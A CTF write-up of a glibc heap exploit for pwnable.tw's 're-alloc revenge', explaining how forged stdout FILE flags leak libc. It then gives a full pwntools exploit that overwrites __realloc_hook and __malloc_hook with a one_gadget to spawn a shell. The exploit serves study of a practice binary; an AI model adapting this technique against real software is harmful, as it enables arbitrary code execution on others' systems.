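This is the same binary as re-alloc, except that PIE and Full RELRO are enabled, so the GOT can no longer be overwritten and libc has to be leaked through the stdout structure. It was my first time using this technique and the process is a bit involved, so I am writing it down.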

Challenge description

A challenge on pwnable.tw: re-alloc with every protection turned on.

Arch:     amd64-64-little
RELRO:    Full RELRO
Stack:    Canary found
NX:       NX enabled
PIE:      PIE enabled
FORTIFY:  Enabled

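I won't go over the functionality, since the binary is otherwise identical to re-alloc.

Background

Leaking libc through the stdout structure

When the binary calls puts, the following call chain ends up in _IO_new_file_overflow: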

_IO_puts --> _IO_sputn --> _IO_new_file_xsputn --> _IO_new_file_overflow

Let's look at the source of _IO_new_file_overflow:

int _IO_new_file_overflow (FILE *f, int ch)
{
    // To skip this branch, _IO_NO_WRITES must be cleared: f->_flags &= ~_IO_NO_WRITES
    if (f->_flags & _IO_NO_WRITES) /* SET ERROR */
    {
        f->_flags |= _IO_ERR_SEEN;
        __set_errno (EBADF);
        return EOF;
    }   
    // To skip this branch, _IO_CURRENTLY_PUTTING must be set (f->_flags |= _IO_CURRENTLY_PUTTING) and _IO_write_base must be non-NULL
    if ((f->_flags & _IO_CURRENTLY_PUTTING) == 0 || f->_IO_write_base == NULL)
    {
        /* Allocate a buffer if needed. */
        if (f->_IO_write_base == NULL)
	    {
            _IO_doallocbuf (f);
            _IO_setg (f, f->_IO_buf_base, f->_IO_buf_base, f->_IO_buf_base);
        }
        
        if (__glibc_unlikely (_IO_in_backup (f)))
	    {
            size_t nbackup = f->_IO_read_end - f->_IO_read_ptr;
            _IO_free_backup_area (f);
            f->_IO_read_base -= MIN (nbackup, f->_IO_read_base - f->_IO_buf_base);
            f->_IO_read_ptr = f->_IO_read_base;
        }

        if (f->_IO_read_ptr == f->_IO_buf_end)
            f->_IO_read_end = f->_IO_read_ptr = f->_IO_buf_base;
        f->_IO_write_ptr = f->_IO_read_ptr;
        f->_IO_write_base = f->_IO_write_ptr;
        f->_IO_write_end = f->_IO_buf_end;
        f->_IO_read_base = f->_IO_read_ptr = f->_IO_read_end;

        f->_flags |= _IO_CURRENTLY_PUTTING;
        if (f->_mode <= 0 && f->_flags & (_IO_LINE_BUF | _IO_UNBUFFERED))
            f->_IO_write_end = f->_IO_write_ptr;
    }
    if (ch == EOF)
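        // This _IO_do_write call is the target. If _IO_write_base < _IO_write_ptr and the memory at
        // _IO_write_base holds useful addresses (libc addresses), they get leaked.
        // Normally _IO_write_base == _IO_write_ptr and both point into libc, so a partial overwrite
        // (setting the low byte of _IO_write_base to "\x00") is enough.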
        return _IO_do_write (f, f->_IO_write_base, f->_IO_write_ptr - f->_IO_write_base);
    if (f->_IO_write_ptr == f->_IO_buf_end ) /* Buffer is really full */
        if (_IO_do_flush (f) == EOF)
            return EOF;
    *f->_IO_write_ptr++ = ch;
    if ((f->_flags & _IO_UNBUFFERED) || ((f->_flags & _IO_LINE_BUF) && ch == '\n'))
        if (_IO_do_write (f, f->_IO_write_base, f->_IO_write_ptr - f->_IO_write_base) == EOF) 
            return EOF;
    return (unsigned char) ch;
}

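The part of _IO_new_file_overflow we want to reach is the call to _IO_do_write.

When stdout is buffered, a flush writes out the buffer contents from _IO_write_base up to _IO_write_ptr. When it is unbuffered, both pointers point to the same location, close to the structure itself and therefore inside libc. After setbuf, stdout is in principle unbuffered. However, if we can modify the _flags field of _IO_2_1_stdout_ so that stdout is treated as if it had pending buffered data, and then partially overwrite _IO_write_base, the bytes between the two pointers are printed and a libc address leaks.

To work out the required flag values we need to look further at _IO_do_write (which is really _IO_new_do_write):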

int _IO_new_do_write (FILE *fp, const char *data, size_t to_do)
{
    return (to_do == 0 || (size_t) new_do_write (fp, data, to_do) == to_do) ? 0 : EOF;
}

static size_t new_do_write (FILE *fp, const char *data, size_t to_do)
{
    size_t count;
    if (fp->_flags & _IO_IS_APPENDING)
        fp->_offset = _IO_pos_BAD;
    else if (fp->_IO_read_end != fp->_IO_write_base)
    {
        // _IO_SYSSEEK simply calls lseek, but we cannot fully control the value of fp->_IO_write_base - fp->_IO_read_end.
        // If fp->_IO_read_end is set to 0, the second argument to _IO_SYSSEEK becomes far too large;
        // if we set fp->_IO_write_base = fp->_IO_read_end instead, other code breaks, because fp->_IO_write_base must not be greater than fp->_IO_write_end.
        // So we set _IO_IS_APPENDING in fp->_flags to avoid entering this else-if branch.
        off64_t new_pos = _IO_SYSSEEK (fp, fp->_IO_write_base - fp->_IO_read_end, 1);
        if (new_pos == _IO_pos_BAD)
	        return 0;
        fp->_offset = new_pos;
    }
    // _IO_SYSWRITE is the call we want to reach
    count = _IO_SYSWRITE (fp, data, to_do);
    if (fp->_cur_column && count)
        fp->_cur_column = _IO_adjust_column (fp->_cur_column - 1, data, count) + 1;
    _IO_setg (fp, fp->_IO_buf_base, fp->_IO_buf_base, fp->_IO_buf_base);
    fp->_IO_write_base = fp->_IO_write_ptr = fp->_IO_buf_base;
    fp->_IO_write_end = (fp->_mode <= 0 && (fp->_flags & (_IO_LINE_BUF | _IO_UNBUFFERED)) ? fp->_IO_buf_base : fp->_IO_buf_end);
    return count;
}
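The two functions above can be condensed into a small Python model that says which branch a given stdout state takes when _IO_new_file_overflow is called with ch == EOF. This is only a simplified sketch for reasoning about the flags: the constants are the ones from glibc's libio.h, while `overflow_path` and its return labels are made-up names, and the buffer allocation and backup-area handling are left out. The example addresses are the ones that appear in the comments of the exploit script.

```python
# Flag bits from glibc's libio.h
_IO_NO_WRITES = 0x0008
_IO_CURRENTLY_PUTTING = 0x0800
_IO_IS_APPENDING = 0x1000


def overflow_path(flags, write_base, write_ptr, read_end):
    """Hypothetical helper: name the branch taken for _IO_new_file_overflow(f, EOF)."""
    if flags & _IO_NO_WRITES:
        return "error: EBADF"
    if not (flags & _IO_CURRENTLY_PUTTING) or write_base == 0:
        # glibc resets the write pointers here, so a forged _IO_write_base is lost
        return "pointers reset"
    if write_ptr == write_base:
        return "nothing to write"
    if not (flags & _IO_IS_APPENDING) and read_end != write_base:
        # new_do_write would call lseek with an offset we do not control
        return "lseek first"
    return "write %#x bytes" % (write_ptr - write_base)


# With _IO_IS_APPENDING set the data goes straight to write()
print(overflow_path(0xfbad1800, 0x7ffff7dd0700, 0x7ffff7dd07e3, 0))
# Without it, the lseek branch is taken first
print(overflow_path(0xfbad0800, 0x7ffff7dd0700, 0x7ffff7dd07e3, 0))
```

Only the first call reaches the write directly, which is why all three flag conditions are needed together.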

Putting this together, _flags has to satisfy:

_flags = 0xfbad0000                 // Magic number
_flags &= ~_IO_NO_WRITES            // _flags = 0xfbad0000
_flags |= _IO_CURRENTLY_PUTTING     // _flags = 0xfbad0800
_flags |= _IO_IS_APPENDING          // _flags = 0xfbad1800

At the same time, _IO_read_ptr, _IO_read_end, _IO_read_base and _IO_write_base can be set to:

_IO_read_ptr = 0;
_IO_read_end = 0;
_IO_read_base = 0;
_IO_write_base = 0x7fXXXXXXXX00;

The data that gets printed then contains a libc address.

Exploitation approach
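To make the overwrite concrete, here is a minimal sketch that builds the 32-byte payload plus the trailing NUL byte and applies it to the first five fields of a FILE structure on amd64. The starting pointer value is the example address from the exploit comments; the starting _flags value is just a placeholder, and the field layout (five consecutive 8-byte slots) is assumed from the amd64 ABI.

```python
import struct

# Flag bits from glibc's libio.h
_IO_MAGIC = 0xFBAD0000
_IO_NO_WRITES = 0x0008
_IO_CURRENTLY_PUTTING = 0x0800
_IO_IS_APPENDING = 0x1000

flags = (_IO_MAGIC & ~_IO_NO_WRITES) | _IO_CURRENTLY_PUTTING | _IO_IS_APPENDING

# _flags, _IO_read_ptr, _IO_read_end, _IO_read_base, _IO_write_base
# before the overwrite; with unbuffered stdout the pointers are all equal.
old_ptr = 0x7ffff7dd07e3  # example address, taken from the exploit comments
fields = bytearray(struct.pack("<5Q", _IO_MAGIC, old_ptr, old_ptr, old_ptr, old_ptr))

# The input is 32 bytes; the program then appends a NUL terminator, which
# lands on the lowest byte of _IO_write_base.
payload = struct.pack("<4Q", flags, 0, 0, 0) + b"\x00"
fields[:len(payload)] = payload

new_flags, _, _, _, write_base = struct.unpack("<5Q", fields)
leak_len = old_ptr - write_base  # _IO_write_ptr is untouched and still equals old_ptr
print(hex(new_flags), hex(write_base), hex(leak_len))
```

The number of leaked bytes is simply the old low byte of the pointer, so the leak window always starts at a 0x100-aligned libc address.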

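Use the UAF that appears when realloc is called with size = 0, together with the free(remainder) that realloc performs when size < old_size, to create overlapping chunks. Then overwrite a chunk's size so that it is large enough to go into the unsorted bin (kept as small as possible here, because the exploit has to brute force and the latency to the remote server is high).
To get the chunk into the unsorted bin, the check below has to be passed: enough chunks must be freed first so that the PREV_INUSE bit of the forged chunk's nextchunk is 1. Since the largest request is 0x78, i.e. the largest chunk size is 0x80, the sequence alloc(0x68), realloc(0x78), free() is repeated several times (allocating 0x68 first prevents the chunk that was just freed into tcache from being handed straight back), until nextchunk lands exactly on a fastbin chunk of size 0x80.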
if (__glibc_unlikely (!prev_inuse(nextchunk)))
    malloc_printerr ("double free or corruption (!prev)");
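The size arithmetic behind the forged chunk can be checked with a few lines of Python. This is a sketch that assumes the usual amd64 malloc parameters (8-byte size field, 16-byte alignment, minimum chunk size 0x20, largest tcache chunk size 0x410); `request2size` mirrors the glibc macro of the same name, and the other names are made up for illustration.

```python
def request2size(req):
    """Chunk size glibc uses for malloc(req) on amd64."""
    return max(0x20, (req + 8 + 0xF) & ~0xF)


PREV_INUSE = 0x1
TCACHE_MAX_CHUNK = 0x410  # chunks above this size are never put into tcache

victim = request2size(0x38)      # the 0x40 chunk whose size field gets forged
filler = request2size(0x78)      # each chunk freed by the alloc/realloc/free loop
fake_size = victim + 8 * filler  # cover the victim plus eight 0x80 chunks

print(hex(request2size(0x68)), hex(filler))  # sizes before and after realloc
print(hex(fake_size | PREV_INUSE))           # value written into the size field
print(fake_size > TCACHE_MAX_CHUNK)          # too big for tcache, so free() uses the unsorted bin
```

With nine 0x80 chunks freed, the forged chunk ends exactly where the ninth one starts, so nextchunk is a real chunk header whose PREV_INUSE bit is set.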

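In addition, the later steps need the forged chunk to be in the unsorted bin and in a tcache bin at the same time, so that memory at the stdout structure can be allocated from that tcache bin. Therefore a double free of this chunk is set up in the tcache bin created by the free(remainder) mentioned above, so that the chunk stays in tcache even after it has been allocated from there once.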

tcache bin  ==>  +--------+ <-- victim_chunk                     tcache bin ==> +--------+ <-- same victim_chunk
                 |        |                   after malloc                      |        |
                 +--------+<--+            ===================>                 +--------+
                 |fd |    |   |                                                 |        |
                 +--------+   |                                                 +--------+
                   |          |
                   +----------+
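The effect of the double free in the diagram can be reproduced with a toy model of a single tcache bin. This is only an illustration: the `Tcache` class is made up, it ignores the per-bin counter, and it ignores the `key` check that glibc 2.29 performs (the exploit overwrites that field before the second free).

```python
class Tcache:
    """Toy model of one tcache bin: a singly linked list of chunk addresses."""

    def __init__(self):
        self.head = None
        self.fd = {}  # chunk address -> next pointer stored inside that chunk

    def free(self, chunk):
        # tcache_put: the freed chunk points at the old head and becomes the head
        self.fd[chunk] = self.head
        self.head = chunk

    def malloc(self):
        # tcache_get: return the head and follow its fd
        chunk = self.head
        self.head = self.fd[chunk]
        return chunk


bin_0x40 = Tcache()
victim = 0x300          # example address with a zero low byte
bin_0x40.free(victim)
bin_0x40.free(victim)   # double free: victim's fd now points at victim itself
got = bin_0x40.malloc()
print(hex(got), hex(bin_0x40.head))
```

After the allocation the bin head is still the victim, which is what allows it to sit in the unsorted bin and in tcache at the same time.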

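Furthermore, alloc always appends a trailing \x00 to the input, which overwrites the low byte of the double-free link from the previous step (the fd of that tcache chunk). The chunk's address therefore has to end in \x00, so that the link survives the overwrite. This is achieved by allocating chunks of suitable sizes at the very beginning and freeing them into tcache. (These chunks are also used at the end of the exploit: by then the unsorted bin is corrupted, so only chunks already in tcache or fastbin can be allocated; anything else would be served from the unsorted bin and abort.)

With the chunk forged, allocate it and free it into the unsorted bin, then use the UAF to partially overwrite the unsorted bin chunk's fd so that it points to stdout (a 4-bit brute force). Then take the chunk out of its tcache bin, which leaves the tcache bin pointing at stdout.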
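A quick way to see why sizes 0x28 and 0x48 are used for the padding chunks is to add up the heap offsets. The sketch below assumes glibc 2.29 on amd64, where the tcache_perthread_struct chunk at the start of the heap is 0x250 bytes, and assumes the heap base is page aligned; the variable names are made up.

```python
def request2size(req):
    """Chunk size glibc uses for malloc(req) on amd64."""
    return max(0x20, (req + 8 + 0xF) & ~0xF)


TCACHE_STRUCT = 0x250  # assumption: size of the tcache_perthread_struct chunk in glibc 2.29
HEADER = 0x10          # prev_size + size fields in front of the user data

offset = TCACHE_STRUCT
for req in (0x28, 0x48):          # the two padding chunks allocated and freed first
    offset += request2size(req)

# alloc(0x58) followed by realloc(0x18) splits the 0x60 chunk into 0x20 + 0x40;
# the 0x40 remainder is the victim chunk.
victim_chunk = offset + request2size(0x18)
victim_user = victim_chunk + HEADER
print(hex(victim_user), hex(victim_user & 0xFF))
```

Because the victim's user pointer ends in 0x00, the NUL byte that alloc appends rewrites the low byte of the self-referencing fd with the value it already had.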

tcache bin ==> +--------+ <--victim_chunk               |
               |        |                               |
               +--------+                               |
               |fd |    |                               |
               +--------+                               |
                 |                                      |
                 +----------> +--------+ <--stdout      |
                              |_flags  |                |
                              +--------+                |
                              |        |                |
                              +--------+                |   after malloc
 ------------------------------------------------------ +  =============> tcache bin ==> +--------+ <--stdout
unsorted bin ==> +--------+ <--same victim_chunk        |                                |_flags  |
                 |        |                             |                                +--------+
                 +--------+                             |                                |        |
                 |fd | bk |--------> main_arena         |                                +--------+        
                 +--------+                             |                         
                   |                                    |
                   +----------> +--------+ <--stdout    |
                                |_flags  |              |
                                +--------+              |
                                |        |              |
                                +--------+              |
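The 4-bit brute force comes from the two-byte partial overwrite: the low 12 bits of the stdout address are fixed by the libc build, while bits 12 to 15 depend on ASLR and have to be guessed. A minimal sketch, using the low bits 0x760 and the guess 0x5 from the exploit script (`STDOUT_LOW12` and `guess` are names made up here):

```python
import struct

STDOUT_LOW12 = 0x760  # low 12 bits of _IO_2_1_stdout_, as used in the exploit
guess = 0x5           # bits 12..15 are randomized, so this nibble is a guess

# Two little-endian bytes written over the low half of the unsorted bin fd;
# this is the same value the exploit sends with p16(0x5760).
partial = struct.pack("<H", (guess << 12) | STDOUT_LOW12)

candidates = 1 << 4           # number of possible values for the unknown nibble
print(partial.hex(), candidates)
```

Each attempt succeeds with probability 1/16, so on average about 16 connections are needed, which is why the exploit wraps everything in a retry loop.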

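Now allocating the chunk at stdout lets us modify the stdout structure, which makes it print the data and leak libc.
After that the unsorted bin is corrupted, only one heap slot can be used for the rest of the exploit (the other must not be freed, or the program aborts), and only chunks already in the bins are available. Within these constraints, allocate a chunk at __realloc_hook, set __realloc_hook to malloc and __malloc_hook to the one_gadget (going through malloc adjusts the stack frame so that [rsp + 0x70] == NULL).
Trigger realloc to get a shell.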
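The address arithmetic of this last stage can be sketched as follows. The two offsets are the ones hard-coded in the exploit script; the leaked value and the malloc offset used in the usage lines are made-up placeholders (the real exploit takes the latter from libc.symbols), and the payload layout assumes, as the exploit does, that __malloc_hook is the 8 bytes right after __realloc_hook.

```python
import struct

LEAK_OFFSET = 0x1e7570        # leaked pointer minus libc base, from the exploit script
ONE_GADGET_OFFSET = 0x106ef8  # one_gadget offset, from the exploit script


def libc_base_from_leak(leak):
    """Hypothetical helper: recover the libc base and sanity-check it."""
    base = leak - LEAK_OFFSET
    if base & 0xFFF:
        raise ValueError("libc base is not page aligned, the leak is probably wrong")
    return base


def hook_payload(malloc_addr, one_gadget_addr):
    # Written at &__realloc_hook: first qword replaces __realloc_hook,
    # second qword replaces __malloc_hook (assumed to be adjacent).
    return struct.pack("<QQ", malloc_addr, one_gadget_addr)


leak = 0x7f1234000000 + LEAK_OFFSET   # made-up leak, for illustration only
base = libc_base_from_leak(leak)
malloc_offset = 0x1000                # placeholder for libc.symbols["malloc"]
payload = hook_payload(base + malloc_offset, base + ONE_GADGET_OFFSET)
print(hex(base), len(payload))
```

Checking page alignment of the computed base is a cheap way to reject a bad leak before spending the remaining heap operations on it.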

exp

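from pwn import *

# NOTE: p (the tube), libc (an ELF object for the target libc) and the helpers
# _pwn_remote, _debug, _proc and _setup_env() come from setup code that is not shown here.
# context.log_level = "debug"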

def alloc(index, size, data):
    p.sendlineafter("Your choice: ", "1")
    p.sendlineafter("Index:", str(index))
    p.sendlineafter("Size:", str(size))
    p.sendafter("Data:", data)

def realloc(index, size, data):
    p.sendlineafter("Your choice: ", "2")
    p.sendlineafter("Index:", str(index))
    p.sendlineafter("Size:", str(size))
    if size != 0:
        p.sendafter("Data:", data)

def free(index):
    p.sendlineafter("Your choice: ", "3")
    p.sendlineafter("Index:", str(index))

offset = 0x1e7570
realloc_hook_offset = libc.symbols["__realloc_hook"]
malloc_offset = libc.symbols["malloc"]
one_gadget_offset = 0x106ef8

while True:
    try:
        # make the lowest byte of bins[1]'s address \x00
        # these chunks are also needed later: at the very end the unsorted bin is broken, so only chunks already in tcache can be used
        alloc(0, 0x28, "AAAA")
        free(0)
        alloc(0, 0x48, "AAAA")
        free(0)

        # three freed tcache bins size = [0x60, 0x40, 0x20]
        # bins[0] and bins[2] have the same address (the size field of both now reads 0x20)
        # bins[1] is right next to bins[0] and bins[2]
        alloc(0, 0x58, "AAAA")
        realloc(0, 0, "")
        realloc(0, 0x18, "BBBB")
        free(0)

        # double free bins[1]
        # so the 0x40 tcache bin hands out the same chunk twice in the steps below
        alloc(0, 0x38, "AAAA")
        realloc(0, 0, "")
        alloc(1, 0x38, "BBBB")
        free(0)
        realloc(1, 0x38, "B" * 0x10)
        free(1)

        # allocate the space that the fake unsorted bin chunk will cover
        # make the fake unsorted bin chunk's nextchunk land exactly on a valid chunk
        # free 9 chunks of size 0x80: 7 fill the tcache bin, the remaining 2 go to the fastbin
        for i in range(9):
            alloc(1, 0x68, "AAAA")
            realloc(1, 0x78, "AAAA")
            free(1)

        # alloc bins[0] to overwrite the size field of bins[1] with 0x441 (8 * 0x80 + 0x40 + 0x1)
        # then alloc bins[1] and free it into the unsorted bin
        alloc(0, 0x58, "D" * 0x18 + p64(0x441))
        free(0)
        alloc(1, 0x38, "DDDD")
        realloc(1, 0, "")

        # partially overwrite the unsorted bin chunk's fd so that it points at stdout (bruteforce 4 bits)
        # this makes the 0x40 tcache bin point to stdout
        realloc(1, 0x38, p16(0x5760))
        alloc(0, 0x38, "DDDD")

        # alloc the chunk at stdout
        # set the fields of the FILE structure there (e.g. at 0x7fdf0ec12760) to force data to be printed
        # _flags = MAGIC                    # 0xfbad0000 
        # _flags &= ~_IO_NO_WRITES          # _flags = 0xfbad0000 
        # _flags |= _IO_CURRENTLY_PUTTING   # _flags = 0xfbad0800
        # _flags |= _IO_IS_APPENDING        # _flags = 0xfbad1800
        # _IO_read_ptr = 0, 
        # _IO_read_end = 0, 
        # _IO_read_base = 0
        # _IO_write_base = 0x7ffff7dd0700
        # _IO_write_ptr = 0x7ffff7dd07e3
        # thus the data between _IO_write_base and _IO_write_ptr will be printed out
        realloc(0, 0x18, "AAAA")
        free(0)
        alloc(0, 0x38, p64(0xfbad1800) + p64(0) * 3)

        # leak libc
        string = p.recv(16)
        print(string)
        if string[:1] == b"$":  # no leak in the output (works for bytes in Python 3 too): reconnect and retry
            p.close()
            if _pwn_remote == 0:
                p = process(argv=[_proc], env=_setup_env())
            else:
                p = remote('chall.pwnable.tw', 10310)
            if _debug != 0:
                gdb.attach(p)
            continue
        
        libc_addr = u64(string[8:])
        libc_base = libc_addr - offset
        realloc_hook = libc_base + realloc_hook_offset
        libc_malloc = libc_base + malloc_offset
        one_gadget = libc_base + one_gadget_offset

        break

    except Exception:  # a wrong guess crashes or closes the connection; Ctrl-C still stops the loop
        p.close()
        if _pwn_remote == 0:
            p = process(argv=[_proc], env=_setup_env())
        else:
            p = remote('chall.pwnable.tw', 10310)
        if _debug != 0:
            gdb.attach(p)
        

success("libc_base: " + hex(libc_base))
success("realloc_hook: " + hex(realloc_hook))
success("libc_malloc: " + hex(libc_malloc))
success("one_gadget: " + hex(one_gadget))

# make heap[1] == NULL (cannot use heap[0] any more)
realloc(1, 0x18, "A" * 0x10)
free(1)

# use the 0x80 tcache and prepared tcache
# create three tcache bins = [0x80, 0x50, 0x30], bins[0] and bins[2] are the same (0x30)
alloc(1, 0x78, "AAAA")
realloc(1, 0, "")
realloc(1, 0x28, "BBBB")
free(1)

# use bins[2] to overwrite the size field and fd of bins[1] with 0x51 and realloc_hook
alloc(1, 0x78, "A" * 0x28 + p64(0x51) + p64(realloc_hook))
realloc(1, 0x18, "AAAA")
free(1)

# make tcache bins in size 0x50 point to realloc_hook
alloc(1, 0x48, "AAAA")
realloc(1, 0x18, "BBBB")
free(1)

# make realloc_hook = malloc, malloc_hook = one_gadget
# then the call will be realloc ==> realloc_hook(malloc) ==> malloc_hook(one_gadget)
# because three "push"'s in malloc will help to satisfy the one_gadget condition that [rsp + 0x70] == NULL 
alloc(1, 0x48, p64(libc_malloc) + p64(one_gadget))

# use realloc to trigger
realloc(1, 0, "")

# use vps to get flag
# p.sendline("cat /home/re-alloc_revenge/flag")
# print(p.recv())

p.interactive()

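Summary

A new trick: partially overwrite the unsorted bin chunk's fd so that it points to stdout, and leak libc without any show function.
With only two heap slots, realloc as the only primitive, a corrupted unsorted bin, the tcache double free check and the need to brute force, debugging and writing the exploit was, for me, quite something…
There also seems to be an approach that modifies the tcache struct. I haven't studied it yet and will look into it when I have time.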

References

Source of the idea, although the script there seems to have problems: http://www.ntype.club/re-alloc_revenge/
The approach that modifies the tcache struct (I haven't tried debugging it yet): https://sh1ner.github.io/2020/02/05/pwnable-tw-re-alloc-revenge/
Using stdout to print data: https://github.com/ctf-wiki/ctf-wiki/blob/master/docs/pwn/linux/glibc-heap/tcache_attack-zh.md
Same topic: https://n0va-scy.github.io/2019/09/21/IO_FILE/
glibc 2.29 source: https://elixir.bootlin.com/glibc/glibc-2.29/source